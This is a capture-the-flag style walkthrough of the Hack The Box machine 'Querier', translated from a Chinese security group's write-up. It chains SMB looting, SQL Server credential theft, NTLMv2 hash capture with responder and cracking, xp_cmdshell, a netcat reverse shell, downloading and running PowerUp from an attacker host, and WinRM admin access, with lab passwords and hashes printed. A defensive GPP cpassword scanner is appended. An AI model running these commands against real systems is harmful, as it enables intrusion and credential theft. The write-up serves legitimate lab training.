Source | MS08067 Intranet Security Knowledge Planet
Author: Aqing (member of the Ms08067 intranet security group)
Target IP: 10.10.10.125
Attacker IP: 10.10.14.6
Tools required
smbclient
responder
nc
PowerUp.ps1
nmap
# nmap -sC -sV -p- 10.10.10.125 -oA querier
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 00:56 EST
Nmap scan report for querier.htb (10.10.10.125)
Host is up (0.013s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
smbclient -U QUERIER/invalid //10.10.10.125/Reports
smb: \> get "Currency Volume Report.xlsm"
# strings vbaProject.bin
macro to pull data for client volume reports
n.Conn]
Open
rver=<
SELECT * FROM volume;
word>
MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
The connection string recovered above gives the SQL Server credentials (user reporting, password PcwTWTHRwryjc$c6).
Connect to the database with mssqlclient
mssqlclient.py -windows-auth querier/reporting:PcwTWTHRwryjc\$c6@10.10.10.125
Once connected, the reporting user has no permission to execute commands. The workaround is xp_dirtree: it makes the SQL Server service account request a directory on an SMB share we control, and responder, running as a fake SMB server, captures the NTLMv2 authentication exchange.
# Start responder
responder -I eth0 -wrf
Crack the hash
Crack the captured hash with hashcat
hashcat -m 5600 ./test.nltmv2 ~/hacktools/worddic/rockyou.txt --force
MSSQL-SVC::QUERIER:7808a070c190110d:0ecfa929ab261b727253df84af7cf1f2:0101000000000000c0653150de09d20128624bd821667131000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d201060004000200000008003000300000
000000000000000000003000009828af224f44d2d8ddb8f0e488a92d1bfff623c7fb3b5448ed22e96f6842e89b0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003600000000000000000000000000:corporate568
Username: mssql-svc
Password: corporate568
SQL> EXEC sp_configure 'show advanced options', 1;
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> xp_cmdshell "dir c:\users"
output
...
Upload nc and connect back
SQL> xp_cmdshell "powershell -command Invoke-WebRequest -Uri http://10.10.14.23/nc.exe -OutFile c:\programdata\nc.exe"
SQL> xp_cmdshell "c:\programdata\nc.exe 10.10.14.6 1234 -e c:\windows\system32\cmd.exe"
# nc listener
nc -lvnp 1234
The reverse shell connects back and commands execute.
Enumerate the host with PowerUp.ps1
PowerUp is a collection of local privilege escalation checks: a set of scripts that look for exploitable Windows service and configuration weaknesses on the target host. It is part of PowerShell Empire and PowerSploit. Reference: https://blog.csdn.net/l1028386804/article/details/86089574/
C:\Windows\system32>powershell
PS C:\Windows\system32> IEX (New-Object Net.Webclient).downloadstring("http://10.10.14.6/PowerUp.ps1")
PS C:\Windows\system32> invoke-allchecks
[*] Checking for cached Group Policy Preferences .xml files....
Changed : {2021-03-14 14:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\GroupPolicy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
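The cached Groups.xml above is the same Group Policy Preferences credential exposure (MS14-025) that defenders should be hunting for in SYSVOL and in the local GroupPolicy\History cache. The following Python script is an added example, not part of the original write-up or of PowerUp: it walks a directory tree and reports every preference XML whose Properties element carries a non-empty cpassword attribute, without decrypting it. The embedded Groups.xml sample is constructed and its cpassword value is a placeholder.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed sample in the GPP Groups.xml layout (not the box's real file);
# the cpassword value is a placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" changed="2021-03-14 14:12:48">
    <Properties action="U" newName="" cpassword="PLACEHOLDER_ENCRYPTED_VALUE" userName="Administrator"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_report" changed="2021-03-14 14:20:00">
    <Properties action="U" cpassword="" userName="svc_report"/>
  </User>
</Groups>
"""

def find_gpp_credentials(xml_text, source="<string>"):
    """One finding per preference item whose Properties carries a non-empty cpassword."""
    findings = []
    for item in ET.fromstring(xml_text).iter():
        props = item.find("Properties")
        if props is None or not props.get("cpassword"):
            continue  # no Properties child, or cpassword absent/empty: nothing stored
        findings.append({
            "file": source,
            "item": item.tag,
            "name": item.get("name"),
            # Groups.xml uses userName; Services/ScheduledTasks use runAs; Drives/DataSources use accountName
            "account": props.get("userName") or props.get("runAs") or props.get("accountName"),
            "action": props.get("action"),
            "changed": item.get("changed"),
        })
    return findings

def scan_gpp_tree(root_dir):
    """Walk a Policies or GroupPolicy\\History tree and collect findings from every preference XML."""
    findings = []
    for path in Path(root_dir).rglob("*.xml"):
        try:
            text = path.read_text(encoding="utf-8-sig")
            if "cpassword" in text:
                findings.extend(find_gpp_credentials(text, str(path)))
        except (OSError, UnicodeDecodeError, ET.ParseError):
            continue  # unreadable or malformed file: skip it and keep scanning
    return findings

if __name__ == "__main__":
    import sys
    # usage: python gpp_cpassword_check.py <path to a Policies or GroupPolicy\History tree>
    for f in scan_gpp_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"[!] {f['file']}: {f['item']} {f['name']} account={f['account']} changed={f['changed']}")
```

Any hit is a credential that must be removed from the policy and rotated, since the encryption key for cpassword is public.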
Execute commands over the WinRM interface
The nmap scan showed port 5985 open on the target.
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.125:5985/wsman',
  user: 'querier\administrator',
  password: 'MyUnclesAreMarioAndLuigi!!1!',
)
command = ""
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build a PowerShell-style prompt on the remote side and print it locally
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    break if command.nil? # EOF on stdin: leave the loop instead of running a nil command
    # Run the typed command remotely, streaming stdout and stderr as they arrive
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
# ruby querier.rb
...
Connect with wmiexec
wmiexec.py Administrator:MyUnclesAreMarioAndLuigi\!\!1\!@10.10.10.125
Across this box, early information gathering mattered most: the nmap scan turned up port 445, which led to the sensitive file on the share; SQL Server was then used for command execution; and finally commands were run over port 5985. When SQL Server does not allow command execution directly, the xp_dirtree + responder approach is another way through.